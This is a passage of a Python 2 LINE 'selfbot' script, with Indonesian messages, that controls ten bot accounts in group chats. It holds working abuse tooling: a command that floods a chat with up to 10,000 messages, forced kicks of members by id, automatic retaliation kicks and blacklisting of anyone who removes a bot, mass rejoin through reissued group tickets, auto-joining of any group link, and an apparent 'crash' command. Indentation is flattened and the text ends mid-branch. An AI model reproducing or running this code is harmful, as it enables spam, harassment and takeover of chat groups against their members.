k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = ks.getGroup(op.param1)
X.preventJoinByTicket = True
ks.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
k2.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k2.getGroup(op.param1)
G.preventJoinByTicket = False
k2.updateGroup(G)
Ti = k2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k1.getGroup(op.param1)
X.preventJoinByTicket = True
k1.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
k3.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k3.getGroup(op.param1)
G.preventJoinByTicket = False
k3.updateGroup(G)
Ti = k3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k2.getGroup(op.param1)
X.preventJoinByTicket = True
k2.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
k4.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k4.getGroup(op.param1)
G.preventJoinByTicket = False
k4.updateGroup(G)
Ti = k4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k3.getGroup(op.param1)
X.preventJoinByTicket = True
k3.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
k5.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k5.getGroup(op.param1)
G.preventJoinByTicket = False
k5.updateGroup(G)
Ti = k5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k4.getGroup(op.param1)
X.preventJoinByTicket = True
k4.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = k5.getGroup(op.param1)
G.preventJoinByTicket = True
k5.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
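    # Protected-member recovery: when an admin is kicked the attacker is kicked back and
    # the admin re-invited; when the owner account (mid) is kicked, the DEF clients kick
    # the attacker, blacklist them, and pull cl back in by ticket.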
if op.type == 19:
        if op.param3 in admin:  # an admin was kicked
if op.param2 in Bots:
pass
            elif op.param3 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if mid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(DEF).updateGroup(G)
Ti = random.choice(DEF).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = random.choice(DEF).getGroup(op.param1)
X.preventJoinByTicket = True
random.choice(DEF).updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------
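    # Room handling: with leaveRoom enabled the bot leaves any chat room it is pulled into.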
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
            # Auto-like new timeline posts; postEndUrl has the form
            # line://home/post?userMid=<mid>&postId=<id>, which the slices below pick apart.
            url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
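    # Main message handler (op.type 25): contact shares feed the black/white-list prompts,
    # then the elif chain below dispatches the chat commands.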
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","Min"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
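    # Second op.type 25 pass: contact shares trigger the pending "Invite:on" flow,
    # followed by the admin command set.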
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
                gs = k5.getGroup(msg.to)  # a single member lookup is enough here
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
                gs = k5.getGroup(msg.to)  # a single member lookup is enough here
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "|| ADMIN=BABANG ADHI||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
                    gs = k5.getGroup(msg.to)  # a single member lookup is enough here
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
k1.findAndAddContactsByMid(target)
k2.findAndAddContactsByMid(target)
k3.findAndAddContactsByMid(target)
k4.findAndAddContactsByMid(target)
k5.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
        #-------------= SC AllBio =---------------- change every bot's status message; format => Allbio: <any text>
elif "Allbio:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k1.getProfile()
profile.statusMessage = string
k1.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k2.getProfile()
profile.statusMessage = string
k2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k3.getProfile()
profile.statusMessage = string
k3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k4.getProfile()
profile.statusMessage = string
k4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k5.getProfile()
profile.statusMessage = string
k5.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
        #--------------= SC rename all bot accounts =-------------- format => Myname: <new name>
elif "Myname:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k1.getProfile()
profile.displayName = string
k1.updateProfile(profile)
k1.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k2.getProfile()
profile.displayName = string
k2.updateProfile(profile)
k2.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k3.getProfile()
profile.displayName = string
k3.updateProfile(profile)
k3.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k4.getProfile()
profile.displayName = string
k4.updateProfile(profile)
k4.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k5.getProfile()
profile.displayName = string
k5.updateProfile(profile)
k5.sendText(msg.to,"Update Name Menjadi : " + string + "")
        #-------------- Spam command ----------
elif "Spam " in msg.text:
            if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg.to, "Add Bosque")
elif msg.text in ["You"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy buka qr","Luffy open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro buka qr","Zorro open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
                ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji open qr","Sanji buka qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy close qr","Luffy tutup qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro tutup qr","Zorro close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji tutup qr","Sanji close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
            rplace=msg.text.lower().replace("jointicket ","")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
                k4.sendText(msg.to,Hmid)
                k5.sendText(msg.to,Imid)
elif "Koplaxs" == msg.text:
if msg.from_ in admin:
